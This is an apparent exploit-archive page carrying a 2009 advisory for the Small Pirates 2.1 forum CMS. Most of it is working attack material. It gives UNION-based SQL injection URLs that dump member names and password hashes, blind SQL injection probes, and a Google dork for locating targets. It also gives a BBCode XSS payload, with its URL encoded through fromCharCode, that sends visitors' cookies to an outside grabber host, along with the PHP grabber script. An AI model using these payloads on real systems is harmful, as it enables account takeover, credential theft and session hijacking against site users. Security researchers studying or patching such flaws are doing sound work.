exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Small Pirates 2.1 SQL Injection

Small Pirates 2.1 SQL Injection
Posted May 29, 2009
Authored by YEnH4ckEr

Small Pirates version 2.1 suffers from SQL injection and cookie stealing vulnerabilities.

tags | exploit, vulnerability, sql injection
SHA-256 | d89f7eb8dcde6fc5937f4bd5606bba68783386d6db9dbcfebf4294bb66a10bd1

Small Pirates 2.1 SQL Injection

Change Mirror Download
----------------------------------------------------------
MULTIPLE REMOTE VULNERABILITIES --Small Pirates v-2.1-->
----------------------------------------------------------

CMS INFORMATION:

-->WEB: http://spirate.net/foro/
-->DOWNLOAD: http://spirate.net/foro/
-->DEMO: http://www.santiagoescraches.com.ar/index.php
-->CATEGORY: CMS / Board

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK: "Basado en Spirate"
-->CATEGORY: SQL INJECTION VULNERABILITIES / COOKIE STEALING / BLIND SQL INJECTION
-->AFFECT VERSION: <= 2.1
-->Discovered Bug date: 2009-05-10
-->Reported Bug date: 2009-05-10
-->Fixed bug date: N/A
-->Info patch: Not fixed
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)



#########################
////////////////////////

SQL INJECTION (SQLi):

////////////////////////
#########################


<<<<---------++++++++++++++ Condition: Nothing +++++++++++++++++--------->>>>


-------
INTRO:
-------


This system is a mixed combinations.

Info by admin (quote):

"cw*= SMF+Paquetes"
"Spirate=cw+añadidos+reparaciones+correcciones"

"*cw = casitaweb."


-------------------
PROOFS OF CONCEPT:
-------------------


[++] GET var --> 'id'

[++] File vuln --> 'pag1.php'


~~~~~> http://[HOST]/pag1.php?id=-1+UNION+ALL+SELECT+1,2,3,version(),5,6/*


[++] GET var --> 'id'

[++] File vuln --> 'pag1-guest.php'


~~~~~> http://[HOST]/pag1-guest.php?id=-1+UNION+ALL+SELECT+1,2,3,concat(user(),0x3A3A3A,database()),5,6/*


[++] GET var --> 'id'

[++] File vuln --> 'rss-coment_post.php'

[++] Note --> More info in source code


~~~~~> http://[HOST]/web/rss/rss-coment_post.php?id=-1+UNION+ALL+SELECT+1,2,concat(user(),0x3A3A,database()),4,5,6,version(),8/*



[++] GET var --> 'id'

[++] File vuln --> 'rss-pic-comment.php'

[++] Note --> More info in source code


~~~~~> http://[HOST]/web/rss/rss-pic-comment.php?id=-1+UNION+ALL+SELECT+1,2,3,4,current_user(),6,user(),8,9,user(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,version(),31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81/*


[++[Return]++] ~~~~~> user, version and database.


----------
EXPLOITS:
----------


~~~~~> http://[HOST]/pag1.php?id=-1+UNION+ALL+SELECT+1,2,3,concat(memberName,0x3A3A3A,passwd),5,6+FROM+smf_members+WHERE+ID_MEMBER=1/*

~~~~~> http://[HOST]/pag1-guest.php?id=-1+UNION+ALL+SELECT+1,2,3,concat(memberName,0x3A3A3A,passwd),5,6+FROM+smf_members+WHERE+ID_MEMBER=1/*

~~~~~> http://[HOST]/web/rss/rss-coment_post.php?id=-1+UNION+ALL+SELECT+1,2,concat(memberName,0x3A3A3A,passwd),4,5,6,concat(memberName,0x3A3A3A,passwd),8+FROM+smf_members+WHERE+ID_MEMBER=1/*

~~~~~> http://[HOST]/web/rss/rss-pic-comment.php?id=-1+UNION+ALL+SELECT+1,2,3,4,concat(memberName,0x3A3A3A,passwd),6,concat(memberName,0x3A3A3A,passwd),8,9,concat(memberName,0x3A3A3A,passwd),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,concat(memberName,0x3A3A3A,passwd),31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81+FROM+smf_members+WHERE+ID_MEMBER=1/*


[++[Return]++] ~~~~~> memberName:::passwd in 'members' table



######################################
//////////////////////////////////////

COOKIE STEALING VULN (BYPASS BBCODE):

//////////////////////////////////////
######################################


<<<<---------++++++++++++++ Condition: Post a comment +++++++++++++++++--------->>>>


-------
INTRO:
-------


This system is a mixed combinations.

Info by admin (quote):

"cw*= SMF+Paquetes"
"Spirate=cw+añadidos+reparaciones+correcciones"

"*cw = casitaweb."


-------------------
PROOF OF CONCEPT:
-------------------


[url][img]http://www.google.es onmouseover=while(true){alert(1);} [/img][/url]


[++[Return]++] ~~~~~> recursive alert message saying "1"


----------
EXPLOIT:
----------


Cookie Grabber Script --> capturethecookies.php

Example Script (Before Creat exploited.txt):

<?php
$ck=$_GET["ck"]; //Capture the cookies
$manejador=fopen("exploited.txt",'a');
fwrite($manejador, "Cookie:\r\n".htmlentities($ck)."\r\n--EOF--\r\n"); //Save the values
fclose($manejador);
echo "<script>location.href='http://[HOST]/index.php';</script>"; //Redirect...
?>

Example Hosting --> http://www.myphpcookiestealing.es/capturethecookies.php?ck=

Poisoning's comment:

[url][img]http://www.owned.owned onmouseover=document.location=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,109,121,112,104,112,99,111,111,107,105,101,115,116,101,97,108,105,110,103,46,101,115,47,99,97,112,116,117,114,101,116,104,101,99,111,111,107,105,101,115,46,112,104,112,63,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61)+document.cookie [/img][/url]


[++[Return]++] ~~~~~> Cookie and PHPSESSID in exploited.txt


###########################
///////////////////////////

BLIND SQL INJECTION (SQLi):

///////////////////////////
###########################


<<<<---------++++++++++++++ Condition: Nothing +++++++++++++++++--------->>>>


-------
INTRO:
-------


This system is a mixed combinations.

Info by admin (quote):

"cw*= SMF+Paquetes"
"Spirate=cw+añadidos+reparaciones+correcciones"

"*cw = casitaweb."


-------------------
PROOFS OF CONCEPT:
-------------------


[++] GET var --> 'id'

[++] File vuln --> 'index.php'


~~~~~> http://[HOST]/?type=rss;action=.xml;sa=comentarios;id=7+and+1=1 --> TRUE

~~~~~> http://[HOST]/?type=rss;action=.xml;sa=comentarios;id=7+and+1=0 --> FALSE


----------
EXPLOITS:
----------


~~~~~> http://[HOST]/?type=rss;action=.xml;sa=comentarios;id=7+and+substring(@@version,1,1)=5 --> TRUE

~~~~~> http://[HOST]/?type=rss;action=.xml;sa=comentarios;id=7+and+substring(@@version,1,1)=4 --> FALSE



#######################################################################
#######################################################################
##*******************************************************************##
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ... ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: SPANISH H4ck3Rs community! ##
##*******************************************************************##
#######################################################################
#######################################################################
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close